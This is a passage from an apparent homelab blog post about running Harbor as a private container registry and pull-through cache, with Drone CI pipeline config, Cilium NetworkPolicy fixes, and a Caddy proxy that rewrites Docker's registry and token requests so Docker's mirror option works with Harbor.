local Pipeline(img_name, version, pr, alpine=false, alpine_ver_int=alpine_ver) = {
  kind: &#34;pipeline&#34;,
  name:
      if pr then
        &#34;Build &#34;+img_name
      else
        &#34;Release &#34;+img_name,
  platform: {
    arch: &#34;arm64&#34;,
  },
  steps: [
    {
      name:
      if pr then
        &#34;Build Image&#34;
      else
        &#34;Release Image&#34;,
      image: &#34;thegeeklab/drone-docker-buildx&#34;,
      privileged: true,
      settings: {
        repo: &#34;harbor.example.com/homelab/&#34;+img_name,
        registry: &#34;harbor.example.com&#34;,
        username: &#34;myuser&#34;,
        password: {
          from_secret: &#34;harbor-secret&#34;,
        },
        dockerfile: img_name+&#34;/Dockerfile&#34;,
        context: img_name+&#34;/&#34;,
        mirror: &#34;https://harbor-mirror.example.com&#34;,
        debug: true,
        buildkit_config: &#39;debug = true\n[registry.&#34;docker.io&#34;]\n  mirrors = [&#34;harbor.example.com/dockerhub-cache&#34;]\n[registry.&#34;quay.io&#34;]\n  mirrors = [&#34;harbor.example.com/quay.io-cache&#34;]\n[registry.&#34;ghcr.io&#34;]\n  mirrors = [&#34;harbor.example.com/github-cache&#34;]&#39;,
        tags: [version, &#34;latest&#34;],
        custom_dns: [&#34;10.0.0.1&#34;],
        build_args: std.prune([
          img_name+&#34;_ver=&#34;+version,
          if alpine then
            &#34;alpine_ver=&#34;+alpine_ver_int
        ]),
        platforms: [
          &#34;linux/amd64&#34;,
          &#34;linux/arm64&#34;,
        ],
        dry_run:
        if pr then
          true
        else
          false
      },
    }
  ],
  trigger:
    if pr then
    {
      event: {
        include: [
          &#34;pull_request&#34;
        ]
      }
    }
    else
    {
      branch: {
        include: [
          &#34;master&#34;
        ]
      },
      event: {
        exclude: [
          &#34;pull_request&#34;
        ]
      }
    }
};

local Image(img_name, version, alpine=false, alpine_ver_int=alpine_ver) = [
  Pipeline(img_name, version, true, alpine, alpine_ver_int),
  Pipeline(img_name, version, false, alpine, alpine_ver_int)
];

Image(&#34;gitea&#34;, &#34;1.21.10&#34;)
</code></pre><p>This configuration uses <a href="https://docs.docker.com/build/buildkit/">buildkit</a> via
the <a href="https://github.com/thegeeklab/drone-docker-buildx">drone-docker-buildx</a>
plugin, which is no longer actively developed. That is one of the reasons why I&rsquo;m
planning to migrate to Woodpecker.
I&rsquo;m creating images for both arm64 and amd64, as most of my Homelab consists
of Raspberry Pis.</p>
<p>One snag I hit during this part of the setup was when I tried to switch the
Fluentd image in my logging setup, already running on Kubernetes, over to
Harbor. I got only pull failures, without any indication what was going wrong.
It turned out that this was the first time my Kubernetes nodes were trying to
access something running in my cluster behind the Traefik ingress at
<code>example.com</code>. And I yet again had to adapt my NetworkPolicy for said Traefik
Ingress.
Looking at the Cilium monitoring, I saw the following whenever one of my k8s
hosts tried to pull the image:</p>
<pre tabindex="0"><code>xx drop (Policy denied) flow 0x0 to endpoint 1868, ifindex 6, file bpf_lxc.c:2069, , identity remote-node-&gt;39413: 10.8.5.218:55064 -&gt; 10.8.4.134:8000 tcp SYN
xx drop (Policy denied) flow 0x0 to endpoint 1868, ifindex 6, file bpf_lxc.c:2069, , identity remote-node-&gt;39413: 10.8.5.218:55064 -&gt; 10.8.4.134:8000 tcp SYN
xx drop (Policy denied) flow 0x0 to endpoint 1868, ifindex 6, file bpf_lxc.c:2069, , identity remote-node-&gt;39413: 10.8.5.218:55064 -&gt; 10.8.4.134:8000 tcp SYN
</code></pre><p>Here the endpoint with the <code>1868</code> identity is Traefik, and we can see that access
from a <code>remote-node</code> identity is failing. This was because, while I had
allowed access from <code>world</code> to Traefik, <code>world</code> in Cilium only means all nodes
outside the Kubernetes cluster. Cluster nodes, including the local host, need
to be explicitly allowed. So I had to add the following to my Traefik NetworkPolicy:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">cluster</span>
</span></span></code></pre></div><p><code>cluster</code> includes both the local host and all other nodes in the cluster.</p>
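<p>For context, that snippet sits inside a CiliumNetworkPolicy selecting my Traefik pods.
Here is a hedged sketch of the overall shape, with the pod label and namespace being
assumptions rather than a copy of my actual policy:</p>
<pre tabindex="0"><code>apiVersion: cilium.io/v2
kind: CiliumNetworkPolicy
metadata:
  name: traefik-ingress
  namespace: traefik
spec:
  endpointSelector:
    matchLabels:
      app.kubernetes.io/name: traefik   # assumed label, adjust to your deployment
  ingress:
    - fromEntities:
        - cluster   # the local host plus all other nodes in the cluster
    - fromEntities:
        - world     # everything outside the cluster
</code></pre>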
<p>With that fixed, my homelab project was able to provide images to both my
Docker-based Nomad cluster and my cri-o-based Kubernetes cluster:</p>
<figure>
    <img loading="lazy" src="homelab-project.png"
         alt="A screenshot of the repositories in the &#39;homelab&#39; project. It shows five repositories: hn-backup, fluentd, hugo, gitea and taskd. They have from 2 to 5 artifacts and 2 to 19 pulls. Overall, the quota used is 1.43 GiB. The access level is shown as &#39;Public&#39;"/> <figcaption>
            <p>My homelab project with five images after a couple of days of usage.</p>
        </figcaption>
</figure>

<h2 id="setting-harbor-up-as-a-pull-through-cache">Setting Harbor up as a pull-through cache</h2>
<p>With the handling of my own images finished and working, the last step remaining
is the setup of pull-through caches for some public image registries. I wanted
to set up an internal mirror for the following registries:</p>
<ul>
<li><a href="https://hub.docker.com/">DockerHub</a></li>
<li><a href="https://quay.io">quay.io</a></li>
<li><a href="ghcr.io">GitHub Container Registry</a></li>
<li><a href="https://registry.k8s.io">The official k8s registry</a></li>
</ul>
<p>In Harbor, each mirror needs to be set up as a separate project, and it needs to
be accessed at &ldquo;harbor.example.com/project-name&rdquo;. This is an issue for Docker
daemons, which I will go into detail about later.</p>
<p>Here is an example for setting up the <code>quay.io</code> cache. First, an endpoint needs
to be defined:</p>
<figure>
    <img loading="lazy" src="new-mirror.png"
         alt="A screenshot of the &#39;New Registry Endpoint&#39; dialogue in Harbor. In the menu on the left, the entry &#39;Registries&#39; is chosen, and then the button &#39;NEW ENDPOINT&#39; was clicked. The dialogue itself has the &#39;Provider&#39; dropdown filled with &#39;Quay&#39;. The name is given as &#39;Quay.io Cache&#39; and the &#39;Endpoint URL&#39; as &#39;https://quay.io&#39;."/> <figcaption>
            <p>Setting up an endpoint for quay.io</p>
        </figcaption>
</figure>

<p>After the endpoint is defined, the project needs to be created:</p>
<figure>
    <img loading="lazy" src="new-mirror-project.png"
         alt="A screenshot of the &#39;New Project&#39; dialogue in Harbor. In the menu on the left, the entry &#39;Projects&#39; is chosen, and then the button &#39;NEW PROJECT was clicked. In the dialogue, the project-name is &#39;quay-cache&#39;, with the &#39;Access Level&#39; checkbox labeled &#39;Public&#39; being checked. The project quota is left at the default &#39;-1&#39;. The &#39;Proxy Cache&#39; toggle is enabled, and the previously shown &#39;Quay.io cache&#39; is chosen in the dropdown."/> <figcaption>
<p>Setting up the mirror project for quay.io</p>
        </figcaption>
</figure>

<p>After these steps are done, a mirror for <a href="https://quay.io">quay.io</a> will be
available at <code>https://harbor.example.com/quay-cache</code>.</p>
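<p>Workloads can reference the cache explicitly by prefixing the project path. As a hedged
example, with the image and tag picked purely for illustration, a Pod pulling a quay.io image
through that cache might look like this:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Pod
metadata:
  name: cache-pull-test
spec:
  containers:
    - name: node-exporter
      # quay.io/prometheus/node-exporter, pulled via the quay-cache project
      image: harbor.example.com/quay-cache/prometheus/node-exporter:v1.7.0
</code></pre><p>That explicit form always works. The trickier part, covered below, is getting
unmodified image references to go through the cache as well.</p>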
<p>Here is a table of the configs for my current mirrors:</p>
<table>
  <thead>
      <tr>
          <th>Name</th>
          <th>Endpoint URL</th>
          <th>Provider</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>dockerhub-cache</td>
          <td><a href="https://hub.docker.com">https://hub.docker.com</a></td>
          <td>Docker Hub</td>
      </tr>
      <tr>
          <td>github-cache</td>
          <td><a href="https://ghcr.io">https://ghcr.io</a></td>
          <td>Github GHCR</td>
      </tr>
      <tr>
          <td>k8s-cache</td>
          <td><a href="https://registry.k8s.io">https://registry.k8s.io</a></td>
          <td>Docker Registry</td>
      </tr>
      <tr>
          <td>quay.io-cache</td>
          <td><a href="https://quay.io">https://quay.io</a></td>
          <td>Quay</td>
      </tr>
  </tbody>
</table>
<p>But there is an issue with Harbor&rsquo;s subpath approach to projects/mirrors:
Docker only supports the <a href="https://docs.docker.com/docker-hub/mirror/#configure-the-docker-daemon">registry-mirror</a>
option, which is only used for DockerHub images, not for any other registry.
And the main issue: it does not support paths in the given mirror URL. Docker
always expects the registry at <code>/</code>, which obviously doesn&rsquo;t work with Harbor&rsquo;s
<code>domain/projectName/</code> scheme.</p>
<p>At the same time, cri-o does not suffer from this issue at all. It follows the
<a href="https://github.com/containers/image/blob/main/docs/containers-registries.conf.5.md">OCI containers-registries spec</a>.
With this spec, and the <code>containers-registries.conf</code> file, it can be configured
to rewrite pulls to any registry URL you like.
I will explain this later, but let&rsquo;s start with the more complicated Docker
daemon case.</p>
<h3 id="what-does-docker-actually-do-when-pulling">What does Docker actually do when pulling?</h3>
<p>While trying to figure out how to solve the issue with Docker&rsquo;s <code>registry-mirror</code>
option, I found <a href="https://smile.eu/en/publications-and-events/how-configure-docker-hub-proxy-harbor">this blog post</a>,
which had an excellent idea: Just rewrite Docker&rsquo;s requests to point them to the
right Harbor URL. And it worked. &#x1f642;</p>
<p>Let&rsquo;s start by having a look at the HTTP requests Docker makes when issuing the
following command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>docker pull postgres:10
</span></span></code></pre></div><p>As the command does not have a registry domain defined, Docker defaults to
DockerHub.
Let&rsquo;s imagine the Docker daemon is configured with <code>--registry-mirror https://harbor.example.com</code>.</p>
<p>The first request Docker would try to make is this:</p>
<pre tabindex="0"><code>GET https://harbor.example.com/v2/
</code></pre><p>It would expect a 401 return code, and a <code>www-authenticate</code> header.
This header looks something like this in the case of Harbor:</p>
<pre tabindex="0"><code>www-authenticate: Bearer realm=&#34;https://harbor.example.com/service/token&#34;,service=&#34;harbor-registry&#34;
</code></pre><p>Next, Docker tries to request a token:</p>
<pre tabindex="0"><code>https://harbor.example.com/service/token?scope=repository:library/postgres/pull&amp;service=harbor-registry
</code></pre><p>Armed with that token, it would look for the manifest file for the postgres:10
image:</p>
<pre tabindex="0"><code>https://harbor.example.com/v2/library/postgres/manifests/10.0
</code></pre><p>This is where things start going wrong with Harbor, because this request, sent
to Harbor, would look for the <code>library</code> project, which does exist by default,
but is not a DockerHub mirror.</p>
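<p>For reference, the whole dance can be reproduced by hand with <code>curl</code>.
This is only a sketch of the requests described above, with <code>jq</code> used purely
to extract the token:</p>
<pre tabindex="0"><code># 1. Initial request: expect a 401 and a www-authenticate header
curl -si https://harbor.example.com/v2/ | grep -i www-authenticate

# 2. Request an anonymous pull token for the repository
TOKEN=$(curl -s &#34;https://harbor.example.com/service/token?scope=repository:library/postgres:pull&amp;service=harbor-registry&#34; | jq -r .token)

# 3. Fetch the manifest with that token
curl -si -H &#34;Authorization: Bearer $TOKEN&#34; \
  -H &#34;Accept: application/vnd.docker.distribution.manifest.v2+json&#34; \
  https://harbor.example.com/v2/library/postgres/manifests/10
</code></pre>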
<p>My first attempt to solve this issue was pretty simplistic: I configured an
additional route for the <code>harbor-core</code> service in my Traefik ingress, with an
additional path rewrite to rewrite requests like <code>/v2/library/postgres/manifests/10.0</code>
to <code>/v2/dockerhub-cache/library/postgres/manifests/10.0</code>. It looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-docker-mirror</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;harbor-mirror.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress-k8s.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`harbor-mirror.example.com`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">middlewares</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">project-rewrite</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-core</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">http-web</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span><span style="display:flex;"><span>---
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Middleware</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">project-rewrite</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replacePathRegex</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">^\/v2\/(.+)$</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">/v2/dockerhub-cache/${1}</span>
</span></span></code></pre></div><p>This worked somewhat. The initial request for <code>/v2/</code> was rewritten. But then
I did not see the <code>/service/token</code> request hit this new <code>harbor-mirror</code> domain
at all. It went to the <code>harbor</code> domain instead. And that request worked:
Docker successfully got a token from that endpoint.
But the token it received was scoped to the <code>/library/postgres</code>
repository.
The next request then went through the <code>harbor-mirror</code> again, which meant the
request was correctly rewritten:</p>
<pre tabindex="0"><code>/v2/dockerhub-cache/library/postgres/manifests/10.0
</code></pre><p>But Harbor would now return a 401, because the token fetched in the previous
step was for <code>/library/postgres/</code>, while the request was now for <code>/dockerhub-cache/library/postgres</code>.</p>
<p>To fix this issue, I did not just need to rewrite the query parameter of the
<code>/service/token</code> request, but also the response to the request before it. The domain to
contact for the <code>/service/token</code> request is taken from the <code>www-authenticate</code>
header of the response to the initial <code>/v2/</code> request, and Harbor of
course always answers with a fixed domain, the one from the <code>externalURL</code>
parameter in the Helm chart. And that&rsquo;s not the route with the rewrite.</p>
<p>So I had to do two additional things, in addition to rewriting paths accessing
<code>/v2/</code>:</p>
<ol>
<li>Rewrite the <code>www-authenticate</code> header from the response to the initial
<code>/v2/</code> request to make the Realm point to the special mirror domain, not
Harbor&rsquo;s domain</li>
<li>Rewrite the <code>scope=repository:</code> in the <code>/service/token</code> request to prefix it
with the name of the DockerHub mirror project in Harbor</li>
</ol>
<p>It turned out that Traefik wasn&rsquo;t really well equipped for that. It can of course
rewrite headers, but there&rsquo;s no facility to work with regexes - I could only
replace the entire <code>www-authenticate</code> header with a static value. And that seemed a bit too inflexible
to me.</p>
<p>So instead, I decided to set up another Pod, running the <a href="https://github.com/caddyserver/caddy">Caddy webserver</a>,
and using it to do the rewrites. I decided to use Caddy instead of Nginx, as the
blog post I linked above did, because I&rsquo;ve already got another Caddy serving
as a webserver for my Nextcloud setup, but currently don&rsquo;t have any Nginx in my
Homelab.</p>
<p>I kept the Caddy setup pretty simple. Here&rsquo;s the Deployment:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-dockerhub-mirror</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">caddy</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">caddy</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">caddy:2.7.6</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/etc/caddy/</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-http</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-mirror-conf</span>
</span></span></code></pre></div><p>Then there&rsquo;s also a service required:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-mirror</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">ClusterIP</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">caddy</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">8080</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">caddy-http</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span></code></pre></div><p>And finally an IngressRoute for my Traefik ingress:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">traefik.io/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">IngressRoute</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">harbor-docker-mirror</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#e6db74">&#34;harbor-mirror.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/target</span>: <span style="color:#e6db74">&#34;ingress-k8s.example.com&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">entryPoints</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">routes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Rule</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">match</span>: <span style="color:#ae81ff">Host(`harbor-mirror.example.com`)</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">services</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">caddy-mirror</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">harbor</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">port</span>: <span style="color:#ae81ff">caddy-http</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">http</span>
</span></span></code></pre></div><p>The really interesting part is the Caddy config:</p>
<pre tabindex="0"><code>apiVersion: v1
kind: ConfigMap
metadata:
  name: caddy-mirror-conf
data:
  Caddyfile: |
    {
      admin off
      auto_https off
      log {
        output stdout
        level INFO
      }
    }
    :8080 {
      log {
        output stdout
        format filter {
          wrap json
          fields {
            request&gt;headers&gt;Authorization delete
            request&gt;headers&gt;Cookie delete
          }
        }
      }
      @v2-subpath {
        path_regexp repo ^/v2/(.+)
      }

      map /service/token {query.scope} {new_scope} {
        ~(repository:)(.*) &#34;${1}dockerhub-cache/${2}&#34;
      }

      rewrite /service/token ?scope={new_scope}&amp;service={query.service}

      header &gt;Www-Authenticate harbor.example.com harbor-mirror.example.com

      rewrite @v2-subpath /v2/dockerhub-cache/{re.repo.1}

      reverse_proxy http://harbor-core.namespace-of-harbor.svc.cluster.local {
        header_up Host &#34;harbor.example.com&#34;
      }
    }
</code></pre><p>The first rewrite is for all requests which go to <code>/v2/</code>. Because I don&rsquo;t want
to append the <code>dockerhub-cache/</code> to the URL for the initial Docker daemon request
for <code>/v2/</code>, I went with the <code>^/v2/(.+)</code> regex for the matcher:</p>
<pre tabindex="0"><code>@v2-subpath {
  path_regexp repo ^/v2/(.+)
}

rewrite @v2-subpath /v2/dockerhub-cache/{re.repo.1}
</code></pre><p>These two lines define a rewrite for all paths <code>/v2/.+</code> to <code>/v2/dockerhub-cache/...</code>,
so that any request going over this mirror automatically accesses the DockerHub
mirror project on my Harbor instance.</p>
<p>The next line just replaces the canonical Harbor domain with the specific mirror
domain in the <code>www-authenticate</code> header, so that the subsequent request for the
token goes through the mirror as well, instead of directly going to Harbor:</p>
<pre tabindex="0"><code>header &gt;Www-Authenticate harbor.example.com harbor-mirror.example.com
</code></pre><p>With this, the <code>realm=&quot;https://harbor.example.com/service/token&quot;</code> part of the
header is rewritten to <code>realm=&quot;https://harbor-mirror.example.com/service/token&quot;</code>.</p>
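<p>A quick way to check that the header rewrite works, once the mirror route is
reachable, is to repeat the initial request against the mirror domain:</p>
<pre tabindex="0"><code># The realm in the response should now point at harbor-mirror.example.com
curl -si https://harbor-mirror.example.com/v2/ | grep -i www-authenticate
</code></pre>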
<p>Now, the request for the token also goes through the Caddy instance, and I can
rewrite the repository in the request&rsquo;s <code>scope</code> parameter:</p>
<pre tabindex="0"><code>map /service/token {query.scope} {new_scope} {
  ~(repository:)(.*) &#34;${1}dockerhub-cache/${2}&#34;
}
rewrite /service/token ?scope={new_scope}&amp;service={query.service}
</code></pre><p>The <code>map</code> instruction matches only requests to <code>/service/token</code> and maps the
<code>scope</code> query parameter into a Caddy-internal variable <code>new_scope</code>: it splits the
<code>scope=repository:library/postgres:pull</code> parameter and grafts the necessary
<code>dockerhub-cache/</code> prefix onto the <code>library/postgres</code> repository name. With this, the
token request is made for the correct repository and Harbor will accept requests
for the image files accompanied by this token.</p>
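<p>This rewrite can also be verified by hand. Requesting a token through the
mirror with the original scope should return a token that Harbor accepts for the
<code>dockerhub-cache</code> repository; a small sketch, assuming anonymous pull on the
public project:</p>
<pre tabindex="0"><code># Caddy rewrites the scope to repository:dockerhub-cache/library/postgres:pull
curl -s &#34;https://harbor-mirror.example.com/service/token?scope=repository:library/postgres:pull&amp;service=harbor-registry&#34; | jq .
</code></pre>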
<p>One note: I had also tried to rewrite the entire query part of the request in
one go, but I hit a weird issue. When operating on the whole query as one,
Caddy would urlencode more parts of the query, in particular the <code>=</code> sign in the
<code>scope</code> and <code>service</code> parameters. And for some reason, Harbor did not like that.
It would only spit out a token when the <code>=</code> signs were left as-is.</p>
<p>And with all of this combined, I could now set the <code>registry-mirror</code> option for
my Docker agents to <code>https://harbor-mirror.example.com</code>, and Docker pulls worked
as intended and used the dockerhub-cache mirror on my Harbor instance without
issue. &#x1f389;</p>
<h2 id="configuring-docker-and-cri-o">Configuring Docker and cri-o</h2>
<p>Onto the last step: Configuring the Docker daemons in my Nomad cluster and the
cri-o daemons in my Kubernetes cluster to use the new Harbor mirrors.</p>
<p>As noted above, Docker only supports mirrors for DockerHub, nothing else.
So configuring those daemons is pretty simple: just add this to the
<code>/etc/docker/daemon.json</code> file:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-json" data-lang="json"><span style="display:flex;"><span>{
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">&#34;registry-mirrors&#34;</span>: [
</span></span><span style="display:flex;"><span>        <span style="color:#e6db74">&#34;https://harbor-mirror.example.com&#34;</span>
</span></span><span style="display:flex;"><span>    ]
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Luckily, <code>registry-mirrors</code> is one of the Docker config options which can be live-reloaded,
so a <code>pkill --signal SIGHUP dockerd</code> is enough; no restart of the daemon or of the
running containers is necessary.</p>
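<p>On each Docker host this boils down to the following; the <code>docker info</code>
format string is just one way to check that the mirror was picked up, assuming a
reasonably recent Docker version:</p>
<pre tabindex="0"><code># Reload the daemon config without restarting any containers
sudo pkill --signal SIGHUP dockerd

# Confirm that the mirror is now active
docker info --format &#39;{{.RegistryConfig.Mirrors}}&#39;
</code></pre>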
<p>The cri-o config is a bit more involved, but it has the benefit of supporting
mirrors for any external registry you like.
Cri-o implements the <a href="https://github.com/containers/image/blob/main/docs/containers-registries.conf.5.md">containers-registries</a>
config files. These can also be reloaded, by sending the daemon a SIGHUP via
